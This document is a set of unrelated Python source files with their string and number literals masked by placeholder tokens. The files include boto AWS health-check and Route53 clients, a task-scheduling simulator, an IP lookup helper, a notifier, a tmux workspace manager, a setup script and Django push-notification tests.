</s>
<s> class HealthCheck ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , access_point = None , interval = <NUM_LIT:30> , target = None , <EOL> healthy_threshold = <NUM_LIT:3> , timeout = <NUM_LIT:5> , unhealthy_threshold = <NUM_LIT:5> ) : <EOL> self . access_point = access_point <EOL> self . interval = interval <EOL> self . target = target <EOL> self . healthy_threshold = healthy_threshold <EOL> self . timeout = timeout <EOL> self . unhealthy_threshold = unhealthy_threshold <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . target <EOL> def startElement ( self , name , attrs , connection ) : <EOL> return None <EOL> def endElement ( self , name , value , connection ) : <EOL> if name == '<STR_LIT>' : <EOL> self . interval = int ( value ) <EOL> elif name == '<STR_LIT>' : <EOL> self . target = value <EOL> elif name == '<STR_LIT>' : <EOL> self . healthy_threshold = int ( value ) <EOL> elif name == '<STR_LIT>' : <EOL> self . timeout = int ( value ) <EOL> elif name == '<STR_LIT>' : <EOL> self . unhealthy_threshold = int ( value ) <EOL> else : <EOL> setattr ( self , name , value ) <EOL> def update ( self ) : <EOL> if not self . access_point : <EOL> return <EOL> new_hc = self . connection . configure_health_check ( self . access_point , self ) <EOL> self . interval = new_hc . interval <EOL> self . target = new_hc . target <EOL> self . healthy_threshold = new_hc . healthy_threshold <EOL> self . unhealthy_threshold = new_hc . unhealthy_threshold <EOL> self . timeout = new_hc . timeout </s>
<s> import xml . sax <EOL> import time <EOL> import uuid <EOL> import urllib <EOL> import boto <EOL> from boto . connection import AWSAuthConnection <EOL> from boto import handler <EOL> from boto . resultset import ResultSet <EOL> import boto . jsonresponse <EOL> import exception <EOL> import hostedzone <EOL> HZXML = """<STR_LIT>""" <EOL> class Route53Connection ( AWSAuthConnection ) : <EOL> DefaultHost = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> Version = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> XMLNameSpace = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , aws_access_key_id = None , aws_secret_access_key = None , <EOL> port = None , proxy = None , proxy_port = None , <EOL> host = DefaultHost , debug = <NUM_LIT:0> ) : <EOL> AWSAuthConnection . __init__ ( self , host , <EOL> aws_access_key_id , aws_secret_access_key , <EOL> True , port , proxy , proxy_port , debug = debug ) <EOL> def _required_auth_capability ( self ) : <EOL> return [ '<STR_LIT>' ] <EOL> def make_request ( self , action , path , headers = None , data = '<STR_LIT>' , params = None ) : <EOL> if params : <EOL> pairs = [ ] <EOL> for key , val in params . iteritems ( ) : <EOL> if val is None : continue <EOL> pairs . append ( key + '<STR_LIT:=>' + urllib . quote ( str ( val ) ) ) <EOL> path += '<STR_LIT:?>' + '<STR_LIT:&>' . join ( pairs ) <EOL> return AWSAuthConnection . make_request ( self , action , path , headers , data ) <EOL> def get_all_hosted_zones ( self , start_marker = None , zone_list = None ) : <EOL> """<STR_LIT>""" <EOL> params = { } <EOL> if start_marker : <EOL> params = { '<STR_LIT>' : start_marker } <EOL> response = self . make_request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . Version , <EOL> params = params ) <EOL> body = response . read ( ) <EOL> boto . log . debug ( body ) <EOL> if response . status >= <NUM_LIT> : <EOL> raise exception . DNSServerError ( response . status , <EOL> response . reason , <EOL> body ) <EOL> e = boto . jsonresponse . Element ( list_marker = '<STR_LIT>' , <EOL> item_marker = ( '<STR_LIT>' , ) ) <EOL> h = boto . jsonresponse . XmlHandler ( e , None ) <EOL> h . parse ( body ) <EOL> if zone_list : <EOL> e [ '<STR_LIT>' ] [ '<STR_LIT>' ] . extend ( zone_list ) <EOL> while e [ '<STR_LIT>' ] . has_key ( '<STR_LIT>' ) : <EOL> next_marker = e [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> zone_list = e [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> e = self . get_all_hosted_zones ( next_marker , zone_list ) <EOL> return e <EOL> def get_hosted_zone ( self , hosted_zone_id ) : <EOL> """<STR_LIT>""" <EOL> uri = '<STR_LIT>' % ( self . Version , hosted_zone_id ) <EOL> response = self . make_request ( '<STR_LIT:GET>' , uri ) <EOL> body = response . read ( ) <EOL> boto . log . debug ( body ) <EOL> if response . status >= <NUM_LIT> : <EOL> raise exception . DNSServerError ( response . status , <EOL> response . reason , <EOL> body ) <EOL> e = boto . jsonresponse . Element ( list_marker = '<STR_LIT>' , <EOL> item_marker = ( '<STR_LIT>' , ) ) <EOL> h = boto . jsonresponse . XmlHandler ( e , None ) <EOL> h . parse ( body ) <EOL> return e <EOL> def create_hosted_zone ( self , domain_name , caller_ref = None , comment = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if caller_ref is None : <EOL> caller_ref = str ( uuid . uuid4 ( ) ) <EOL> params = { '<STR_LIT:name>' : domain_name , <EOL> '<STR_LIT>' : caller_ref , <EOL> '<STR_LIT>' : comment , <EOL> '<STR_LIT>' : self . XMLNameSpace } <EOL> xml = HZXML % params <EOL> uri = '<STR_LIT>' % self . Version <EOL> response = self . make_request ( '<STR_LIT:POST>' , uri , <EOL> { '<STR_LIT:Content-Type>' : '<STR_LIT>' } , xml ) <EOL> body = response . read ( ) <EOL> boto . log . debug ( body ) <EOL> if response . status == <NUM_LIT> : <EOL> e = boto . jsonresponse . Element ( list_marker = '<STR_LIT>' , <EOL> item_marker = ( '<STR_LIT>' , ) ) <EOL> h = boto . jsonresponse . XmlHandler ( e , None ) <EOL> h . parse ( body ) <EOL> return e <EOL> else : <EOL> raise exception . DNSServerError ( response . status , <EOL> response . reason , <EOL> body ) <EOL> def delete_hosted_zone ( self , hosted_zone_id ) : <EOL> uri = '<STR_LIT>' % ( self . Version , hosted_zone_id ) <EOL> response = self . make_request ( '<STR_LIT>' , uri ) <EOL> body = response . read ( ) <EOL> boto . log . debug ( body ) <EOL> if response . status not in ( <NUM_LIT:200> , <NUM_LIT> ) : <EOL> raise exception . DNSServerError ( response . status , <EOL> response . reason , <EOL> body ) <EOL> e = boto . jsonresponse . Element ( ) <EOL> h = boto . jsonresponse . XmlHandler ( e , None ) <EOL> h . parse ( body ) <EOL> return e <EOL> def get_all_rrsets ( self , hosted_zone_id , type = None , <EOL> name = None , identifier = None , maxitems = None ) : <EOL> """<STR_LIT>""" <EOL> from boto . route53 . record import ResourceRecordSets <EOL> params = { '<STR_LIT:type>' : type , '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : identifier , '<STR_LIT>' : maxitems } <EOL> uri = '<STR_LIT>' % ( self . Version , hosted_zone_id ) <EOL> response = self . make_request ( '<STR_LIT:GET>' , uri , params = params ) <EOL> body = response . read ( ) <EOL> boto . log . debug ( body ) <EOL> if response . status >= <NUM_LIT> : <EOL> raise exception . DNSServerError ( response . status , <EOL> response . reason , <EOL> body ) <EOL> rs = ResourceRecordSets ( connection = self , hosted_zone_id = hosted_zone_id ) <EOL> h = handler . XmlHandler ( rs , self ) <EOL> xml . sax . parseString ( body , h ) <EOL> return rs <EOL> def change_rrsets ( self , hosted_zone_id , xml_body ) : <EOL> """<STR_LIT>""" <EOL> uri = '<STR_LIT>' % ( self . Version , hosted_zone_id ) <EOL> response = self . make_request ( '<STR_LIT:POST>' , uri , <EOL> { '<STR_LIT:Content-Type>' : '<STR_LIT>' } , <EOL> xml_body ) <EOL> body = response . read ( ) <EOL> boto . log . debug ( body ) <EOL> if response . status >= <NUM_LIT> : <EOL> raise exception . DNSServerError ( response . status , <EOL> response . reason , <EOL> body ) <EOL> e = boto . jsonresponse . Element ( ) <EOL> h = boto . jsonresponse . XmlHandler ( e , None ) <EOL> h . parse ( body ) <EOL> return e <EOL> def get_change ( self , change_id ) : <EOL> """<STR_LIT>""" <EOL> uri = '<STR_LIT>' % ( self . Version , change_id ) <EOL> response = self . make_request ( '<STR_LIT:GET>' , uri ) <EOL> body = response . read ( ) <EOL> boto . log . debug ( body ) <EOL> if response . status >= <NUM_LIT> : <EOL> raise exception . DNSServerError ( response . status , <EOL> response . reason , <EOL> body ) <EOL> e = boto . jsonresponse . Element ( ) <EOL> h = boto . jsonresponse . XmlHandler ( e , None ) <EOL> h . parse ( body ) <EOL> return e </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import math <EOL> import numpy <EOL> import random <EOL> import Queue <EOL> from util import Job , TaskDistributions <EOL> MEDIAN_TASK_DURATION = <NUM_LIT:100> <EOL> NETWORK_DELAY = <NUM_LIT:0.5> <EOL> TASKS_PER_JOB = <NUM_LIT:100> <EOL> SLOTS_PER_WORKER = <NUM_LIT:4> <EOL> TOTAL_WORKERS = <NUM_LIT> <EOL> PROBE_RATIO = <NUM_LIT:2> <EOL> def get_percentile ( N , percent , key = lambda x : x ) : <EOL> if not N : <EOL> return <NUM_LIT:0> <EOL> k = ( len ( N ) - <NUM_LIT:1> ) * percent <EOL> f = math . floor ( k ) <EOL> c = math . ceil ( k ) <EOL> if f == c : <EOL> return key ( N [ int ( k ) ] ) <EOL> d0 = key ( N [ int ( f ) ] ) * ( c - k ) <EOL> d1 = key ( N [ int ( c ) ] ) * ( k - f ) <EOL> return d0 + d1 <EOL> def plot_cdf ( values , filename ) : <EOL> values . sort ( ) <EOL> f = open ( filename , "<STR_LIT:w>" ) <EOL> for percent in range ( <NUM_LIT:100> ) : <EOL> fraction = percent / <NUM_LIT> <EOL> f . write ( "<STR_LIT>" % ( fraction , get_percentile ( values , fraction ) ) ) <EOL> f . close ( ) <EOL> class Event ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def run ( self , current_time ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class JobArrival ( Event ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , simulation , interarrival_delay , task_distribution ) : <EOL> self . simulation = simulation <EOL> self . interarrival_delay = interarrival_delay <EOL> self . task_distribution = task_distribution <EOL> def run ( self , current_time ) : <EOL> job = Job ( TASKS_PER_JOB , current_time , self . task_distribution , MEDIAN_TASK_DURATION ) <EOL> logging . getLogger ( "<STR_LIT>" ) . debug ( "<STR_LIT>" % ( job . id , current_time ) ) <EOL> new_events = self . simulation . send_probes ( job , current_time ) <EOL> arrival_delay = random . expovariate ( <NUM_LIT:1.0> / self . interarrival_delay ) <EOL> new_events . append ( ( current_time + arrival_delay , self ) ) <EOL> logging . getLogger ( "<STR_LIT>" ) . debug ( "<STR_LIT>" % len ( new_events ) ) <EOL> return new_events <EOL> class ProbeEvent ( Event ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , worker , job_id ) : <EOL> self . worker = worker <EOL> self . job_id = job_id <EOL> def run ( self , current_time ) : <EOL> return self . worker . add_probe ( self . job_id , current_time ) <EOL> class NoopGetTaskResponseEvent ( Event ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , worker , num_tasks ) : <EOL> self . worker = worker <EOL> self . num_tasks = num_tasks <EOL> def run ( self , current_time ) : <EOL> logging . getLogger ( "<STR_LIT>" ) . debug ( "<STR_LIT>" % <EOL> ( self . worker . id , current_time ) ) <EOL> return self . worker . free_slots ( current_time , self . num_tasks ) <EOL> class TaskEndEvent ( ) : <EOL> def __init__ ( self , worker ) : <EOL> self . worker = worker <EOL> def run ( self , current_time ) : <EOL> return self . worker . free_slots ( current_time , <NUM_LIT:1> ) <EOL> class Worker ( object ) : <EOL> def __init__ ( self , simulation , num_slots , id ) : <EOL> self . simulation = simulation <EOL> self . num_free_slots = num_slots <EOL> self . queued_probes = Queue . Queue ( ) <EOL> self . id = id <EOL> self . probes_replied_to_immediately = <NUM_LIT:0> <EOL> def add_probe ( self , job_id , current_time ) : <EOL> self . queued_probes . put ( job_id ) <EOL> new_events = self . maybe_get_tasks ( current_time ) <EOL> self . probes_replied_to_immediately += len ( new_events ) <EOL> logging . getLogger ( "<STR_LIT>" ) . debug ( "<STR_LIT>" % <EOL> ( self . id , self . probes_replied_to_immediately ) ) <EOL> return new_events <EOL> def free_slots ( self , current_time , num_slots ) : <EOL> """<STR_LIT>""" <EOL> self . num_free_slots += num_slots <EOL> get_task_events = self . maybe_get_tasks ( current_time ) <EOL> return get_task_events <EOL> def maybe_get_tasks ( self , current_time ) : <EOL> events = [ ] <EOL> while not self . queued_probes . empty ( ) and self . num_free_slots > <NUM_LIT:0> : <EOL> self . num_free_slots -= <NUM_LIT:1> <EOL> job_id = self . queued_probes . get ( ) <EOL> num_tasks_to_get = <NUM_LIT:1> <EOL> if self . num_free_slots > <NUM_LIT:0> and self . queued_probes . empty ( ) : <EOL> num_tasks_to_get += self . num_free_slots <EOL> self . num_free_slots = <NUM_LIT:0> <EOL> logging . getLogger ( "<STR_LIT>" ) . debug ( "<STR_LIT>" % num_tasks_to_get ) <EOL> task_durations = self . simulation . get_tasks ( job_id , num_tasks_to_get ) <EOL> probe_response_time = current_time + <NUM_LIT:2> * NETWORK_DELAY <EOL> events = [ ] <EOL> for task_duration in task_durations : <EOL> task_end_time = probe_response_time + task_duration <EOL> logging . getLogger ( "<STR_LIT>" ) . debug ( ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % <EOL> ( job_id , self . id , current_time , task_duration , task_end_time ) ) <EOL> self . simulation . add_task_completion_time ( job_id , task_end_time ) <EOL> events . append ( ( task_end_time , TaskEndEvent ( self ) ) ) <EOL> if len ( events ) < num_tasks_to_get : <EOL> unfilled_slots = num_tasks_to_get - len ( events ) <EOL> logging . getLogger ( "<STR_LIT>" ) . debug ( "<STR_LIT>" % <EOL> ( self . id , probe_response_time ) ) <EOL> events . append ( ( probe_response_time , <EOL> NoopGetTaskResponseEvent ( self , unfilled_slots ) ) ) <EOL> return events <EOL> class Simulation ( object ) : <EOL> def __init__ ( self , num_jobs , file_prefix , load , task_distribution ) : <EOL> avg_used_slots = load * SLOTS_PER_WORKER * TOTAL_WORKERS <EOL> self . interarrival_delay = ( <NUM_LIT:1.0> * MEDIAN_TASK_DURATION * TASKS_PER_JOB / avg_used_slots ) <EOL> print ( "<STR_LIT>" % <EOL> ( self . interarrival_delay , avg_used_slots ) ) <EOL> self . jobs = { } <EOL> self . remaining_jobs = num_jobs <EOL> self . event_queue = Queue . PriorityQueue ( ) <EOL> self . workers = [ ] <EOL> self . file_prefix = file_prefix <EOL> while len ( self . workers ) < TOTAL_WORKERS : <EOL> self . workers . append ( Worker ( self , SLOTS_PER_WORKER , len ( self . workers ) ) ) <EOL> self . worker_indices = range ( TOTAL_WORKERS ) <EOL> self . task_distribution = task_distribution <EOL> def send_probes ( self , job , current_time ) : <EOL> """<STR_LIT>""" <EOL> self . jobs [ job . id ] = job <EOL> random . shuffle ( self . worker_indices ) <EOL> probe_events = [ ] <EOL> num_probes = PROBE_RATIO * len ( job . unscheduled_tasks ) <EOL> for worker_index in self . worker_indices [ : num_probes ] : <EOL> probe_events . append ( ( current_time + NETWORK_DELAY , <EOL> ProbeEvent ( self . workers [ worker_index ] , job . id ) ) ) <EOL> return probe_events <EOL> def get_tasks ( self , job_id , num_tasks ) : <EOL> job = self . jobs [ job_id ] <EOL> remaining_tasks = num_tasks <EOL> task_durations = [ ] <EOL> while len ( job . unscheduled_tasks ) > <NUM_LIT:0> and remaining_tasks > <NUM_LIT:0> : <EOL> task_durations . append ( job . unscheduled_tasks [ <NUM_LIT:0> ] ) <EOL> job . unscheduled_tasks = job . unscheduled_tasks [ <NUM_LIT:1> : ] <EOL> remaining_tasks -= <NUM_LIT:1> <EOL> assert len ( task_durations ) + remaining_tasks == num_tasks <EOL> return task_durations <EOL> def add_task_completion_time ( self , job_id , completion_time ) : <EOL> job_complete = self . jobs [ job_id ] . task_completed ( completion_time ) <EOL> if job_complete : <EOL> self . remaining_jobs -= <NUM_LIT:1> <EOL> logging . getLogger ( "<STR_LIT>" ) . debug ( "<STR_LIT>" % <EOL> ( job_id , self . jobs [ job_id ] . end_time - self . jobs [ job_id ] . start_time ) ) <EOL> def run ( self ) : <EOL> half_jobs = self . remaining_jobs / <NUM_LIT:2> <EOL> self . event_queue . put ( ( <NUM_LIT:0> , JobArrival ( self , self . interarrival_delay , self . task_distribution ) ) ) <EOL> last_time = <NUM_LIT:0> <EOL> output_worker_loads = False <EOL> while self . remaining_jobs > <NUM_LIT:0> : <EOL> if not output_worker_loads and self . remaining_jobs == half_jobs : <EOL> worker_loads = [ w . num_free_slots for w in self . workers ] <EOL> plot_cdf ( worker_loads , "<STR_LIT>" % self . file_prefix ) <EOL> output_worker_loads = True <EOL> current_time , event = self . event_queue . get ( ) <EOL> assert current_time >= last_time <EOL> last_time = current_time <EOL> new_events = event . run ( current_time ) <EOL> for new_event in new_events : <EOL> self . event_queue . put ( new_event ) <EOL> print ( "<STR_LIT>" % <EOL> ( last_time , len ( self . jobs ) ) ) <EOL> complete_jobs = [ j for j in self . jobs . values ( ) if j . completed_tasks_count == j . num_tasks ] <EOL> print "<STR_LIT>" % len ( complete_jobs ) <EOL> response_times = [ job . end_time - job . start_time for job in complete_jobs <EOL> if job . start_time > <NUM_LIT:0> ] <EOL> print "<STR_LIT>" % len ( response_times ) <EOL> plot_cdf ( response_times , "<STR_LIT>" % self . file_prefix ) <EOL> print "<STR_LIT>" , numpy . mean ( response_times ) <EOL> longest_tasks = [ job . longest_task for job in complete_jobs ] <EOL> plot_cdf ( longest_tasks , "<STR_LIT>" % self . file_prefix ) <EOL> tasks_replied_to_immediately = sum ( [ w . probes_replied_to_immediately for w in self . workers ] ) <EOL> print "<STR_LIT>" , tasks_replied_to_immediately <EOL> return response_times <EOL> def main ( ) : <EOL> random . seed ( <NUM_LIT:1> ) <EOL> logging . basicConfig ( level = logging . INFO ) <EOL> sim = Simulation ( <NUM_LIT:1000> , "<STR_LIT>" , <NUM_LIT> , TaskDistributions . CONSTANT ) <EOL> sim . run ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> '''<STR_LIT>''' <EOL> import netaddr <EOL> def lookup ( name ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> ip = netaddr . IPAddress ( name ) <EOL> return __generator ( [ ip ] ) <EOL> except Exception as e : <EOL> pass <EOL> try : <EOL> subnet = netaddr . IPNetwork ( name ) <EOL> return __generator ( subnet ) <EOL> except Exception as e : <EOL> pass <EOL> try : <EOL> glob = netaddr . IPGlob ( name ) <EOL> return __generator ( glob ) <EOL> except Exception as e : <EOL> pass <EOL> return None <EOL> def __generator ( x ) : <EOL> '''<STR_LIT>''' <EOL> for item in x : <EOL> yield ( item , str ( item ) , None ) </s>
<s> from dbus . exceptions import DBusException <EOL> try : <EOL> from gi . repository import Notify <EOL> except ImportError : <EOL> from scudcloud import notify2 <EOL> Notify = None <EOL> class Notifier ( object ) : <EOL> def __init__ ( self , app_name , icon ) : <EOL> self . icon = icon <EOL> try : <EOL> if Notify is not None : <EOL> Notify . init ( app_name ) <EOL> self . notifier = Notify <EOL> else : <EOL> notify2 . init ( app_name ) <EOL> self . notifier = notify2 <EOL> self . enabled = True <EOL> except DBusException : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . enabled = False <EOL> def notify ( self , title , message , icon = None ) : <EOL> if not self . enabled : <EOL> return <EOL> if icon is None : <EOL> icon = self . icon <EOL> if Notify is not None : <EOL> notice = self . notifier . Notification . new ( title , message , icon ) <EOL> else : <EOL> notice = notify2 . Notification ( title , message , icon ) <EOL> notice . set_hint_string ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> notice . show ( ) </s>
<s> import re <EOL> import sys <EOL> import os <EOL> from . logger import Logger <EOL> from . tmux import Tmux <EOL> from . git import Git <EOL> log = Logger ( ) <EOL> class WorkspaceException ( Exception ) : <EOL> def __init__ ( self , message , errors = '<STR_LIT>' ) : <EOL> super ( WorkspaceException , self ) . __init__ ( message ) <EOL> self . errors = errors <EOL> self . message = message <EOL> class Workspace ( object ) : <EOL> _tmux = Tmux ( ) <EOL> _config = { } <EOL> _name = '<STR_LIT>' <EOL> _root = '<STR_LIT>' <EOL> _venv = [ ] <EOL> _session = { } <EOL> _windows = [ ] <EOL> def __init__ ( self , config = None ) : <EOL> """<STR_LIT>""" <EOL> self . set_config ( config ) <EOL> def set_config ( self , config ) : <EOL> self . _config = config <EOL> self . _name = self . _config . get ( '<STR_LIT:name>' ) <EOL> self . _root = self . _config . get ( '<STR_LIT>' ) or os . getcwd ( ) <EOL> self . _root = os . path . expanduser ( self . _root ) <EOL> venv = self . _config . get ( '<STR_LIT>' ) <EOL> if venv : <EOL> if self . _root and not os . path . isabs ( venv ) : <EOL> venv = os . path . join ( self . _root , venv ) <EOL> self . _venv = [ <EOL> '<STR_LIT>' . format ( os . path . join ( venv , '<STR_LIT>' ) ) ] <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _root : <EOL> if not os . path . isdir ( self . _root ) : <EOL> raise WorkspaceException ( '<STR_LIT>' , <EOL> self . _root ) <EOL> os . chdir ( self . _root ) <EOL> for window in self . _config . get ( '<STR_LIT>' , [ ] ) : <EOL> if isinstance ( window , str ) : <EOL> name = window <EOL> else : <EOL> name = next ( iter ( window . keys ( ) ) ) <EOL> window = window [ name ] or { } <EOL> if isinstance ( window , str ) : <EOL> panes = [ window ] <EOL> window = { } <EOL> else : <EOL> panes = window . get ( '<STR_LIT>' , [ ] ) <EOL> post_cmds = window . get ( '<STR_LIT>' , [ ] ) <EOL> post_cmds = [ post_cmds ] if isinstance ( post_cmds , str ) else post_cmds <EOL> self . _windows . append ( <EOL> self . create_window ( <EOL> name , panes , post_cmds , window . get ( '<STR_LIT>' ) ) ) <EOL> self . attach ( ) <EOL> return self . _windows <EOL> def stop ( self , name = None ) : <EOL> """<STR_LIT>""" <EOL> self . _tmux . kill_session ( name or self . _name ) <EOL> def attach ( self , name = None ) : <EOL> """<STR_LIT>""" <EOL> self . _tmux . attach ( name or self . _name ) <EOL> def ls ( self ) : <EOL> """<STR_LIT>""" <EOL> windows , errors = self . _tmux . get_windows ( self . _name ) <EOL> if errors : <EOL> raise WorkspaceException ( '<STR_LIT>' , errors ) <EOL> log . echo ( '<STR_LIT>' ) <EOL> log . echo ( repr ( windows ) ) <EOL> for window in windows : <EOL> win_id = window [ '<STR_LIT>' ] <EOL> panes , errors = self . _tmux . get_panes ( self . _name , win_id ) <EOL> if errors : <EOL> raise WorkspaceException ( '<STR_LIT>' , errors ) <EOL> log . echo ( '<STR_LIT>' . format ( win_id ) ) <EOL> log . echo ( repr ( panes ) ) <EOL> def create_window ( self , name , panes , post_cmds , layout = None ) : <EOL> """<STR_LIT>""" <EOL> if len ( self . _windows ) > <NUM_LIT:0> : <EOL> window , pane = self . _tmux . new_window ( self . _name , name ) <EOL> else : <EOL> self . _session , window , pane = self . _tmux . new_session ( self . _name , name ) <EOL> if not self . _session : <EOL> print ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> session_name = self . _session [ '<STR_LIT:name>' ] <EOL> window [ '<STR_LIT>' ] = [ ] <EOL> for pane_schema in panes : <EOL> if len ( window [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> pane = self . _tmux . new_pane ( session_name , name , pane [ '<STR_LIT:index>' ] ) <EOL> window [ '<STR_LIT>' ] . append ( pane ) <EOL> cmds = next ( iter ( pane_schema . values ( ) ) ) if isinstance ( pane_schema , dict ) else [ pane_schema ] <EOL> cmds = self . _venv + cmds + post_cmds <EOL> for cmd in cmds : <EOL> self . _tmux . send_keys ( session_name , name , pane [ '<STR_LIT:index>' ] , cmd ) <EOL> self . _tmux . set_layout ( session_name , name , layout ) <EOL> return window <EOL> @ staticmethod <EOL> def initialize ( root_dir ) : <EOL> """<STR_LIT>""" <EOL> dirs = next ( os . walk ( root_dir ) ) [ <NUM_LIT:1> ] <EOL> repos = [ ] <EOL> skipped = [ ] <EOL> for directory in dirs : <EOL> os . chdir ( os . path . join ( root_dir , directory ) ) <EOL> if Git . is_git_repo ( ) : <EOL> log . echo ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( directory ) ) <EOL> url = Git . get_remote_url ( ) <EOL> name = url . replace ( '<STR_LIT::>' , '<STR_LIT:/>' ) <EOL> name = re . sub ( '<STR_LIT>' , '<STR_LIT>' , name ) <EOL> name = '<STR_LIT:/>' . join ( name . split ( '<STR_LIT:/>' ) [ - <NUM_LIT:2> : ] ) <EOL> if name . split ( '<STR_LIT:/>' ) [ <NUM_LIT:1> ] == directory : <EOL> repos . append ( name ) <EOL> else : <EOL> repos . append ( { '<STR_LIT>' : directory , '<STR_LIT:name>' : name } ) <EOL> else : <EOL> skipped . append ( directory ) <EOL> log . echo ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( skipped ) ) ) <EOL> return { <EOL> '<STR_LIT:name>' : os . path . basename ( root_dir ) , <EOL> '<STR_LIT>' : root_dir , <EOL> '<STR_LIT>' : repos <EOL> } </s>
<s> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> download_url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> install_requires = [ '<STR_LIT>' ] , <EOL> keywords = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from django . contrib . auth import get_user_model <EOL> import mock <EOL> from django . test import TestCase <EOL> from pushy . utils import send_push_notification <EOL> from pushy . models import PushNotification , Device <EOL> class AddTaskTestCase ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . payload = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def test_add_task ( self ) : <EOL> mock_task = mock . Mock ( ) <EOL> with mock . patch ( '<STR_LIT>' , new = mock_task ) as mocked_task : <EOL> send_push_notification ( '<STR_LIT>' , self . payload ) <EOL> notification = PushNotification . objects . latest ( '<STR_LIT:id>' ) <EOL> mocked_task . assert_called_once_with ( notification_id = notification . id ) <EOL> self . assertEquals ( notification . payload , self . payload ) <EOL> def test_add_task_filter_device ( self ) : <EOL> device = Device . objects . create ( key = '<STR_LIT>' , <EOL> type = Device . DEVICE_TYPE_IOS ) <EOL> mock_task = mock . Mock ( ) <EOL> with mock . patch ( '<STR_LIT>' , new = mock_task ) as mocked_task : <EOL> send_push_notification ( '<STR_LIT>' , self . payload , device = device ) <EOL> notification = PushNotification . objects . latest ( '<STR_LIT:id>' ) <EOL> mocked_task . assert_called_with ( kwargs = { <EOL> '<STR_LIT>' : device . id , <EOL> '<STR_LIT>' : notification . payload <EOL> } ) <EOL> def test_add_task_filter_on_user ( self ) : <EOL> user = get_user_model ( ) . objects . create_user ( username = '<STR_LIT>' , <EOL> email = '<STR_LIT>' , <EOL> password = '<STR_LIT>' ) <EOL> mock_task = mock . Mock ( ) <EOL> with mock . patch ( '<STR_LIT>' , new = mock_task ) as mocked_task : <EOL> send_push_notification ( '<STR_LIT>' , self . payload , <EOL> filter_user = user ) <EOL> notification = PushNotification . objects . latest ( '<STR_LIT:id>' ) <EOL> mocked_task . assert_called_with ( notification_id = notification . id ) <EOL> self . assertEqual ( notification . filter_user , user . id ) <EOL> self . assertEqual ( notification . filter_type , <NUM_LIT:0> ) <EOL> def test_add_task_filter_on_device_type ( self ) : <EOL> mock_task = mock . Mock ( ) <EOL> with mock . patch ( '<STR_LIT>' , new = mock_task ) as mocked_task : <EOL> send_push_notification ( '<STR_LIT>' , self . payload , <EOL> filter_type = Device . DEVICE_TYPE_IOS ) <EOL> notification = PushNotification . objects . latest ( '<STR_LIT:id>' ) <EOL> mocked_task . assert_called_with ( notification_id = notification . id ) <EOL> self . assertEqual ( notification . filter_user , <NUM_LIT:0> ) <EOL> self . assertEqual ( notification . filter_type , Device . DEVICE_TYPE_IOS ) <EOL> def test_add_task_filter_on_device_type_and_user ( self ) : <EOL> user = get_user_model ( ) . objects . create_user ( username = '<STR_LIT>' , <EOL> email = '<STR_LIT>' , <EOL> password = '<STR_LIT>' ) <EOL> mock_task = mock . Mock ( ) <EOL> with mock . patch ( '<STR_LIT>' , new = mock_task ) as mocked_task : <EOL> send_push_notification ( '<STR_LIT>' , self . payload , <EOL> filter_type = Device . DEVICE_TYPE_IOS , <EOL> filter_user = user ) <EOL> notification = PushNotification . objects . latest ( '<STR_LIT:id>' ) <EOL> mocked_task . assert_called_with ( notification_id = notification . id ) <EOL> self . assertEqual ( notification . filter_user , user . id ) <EOL> self . assertEqual ( notification . filter_type , Device . DEVICE_TYPE_IOS ) </s>
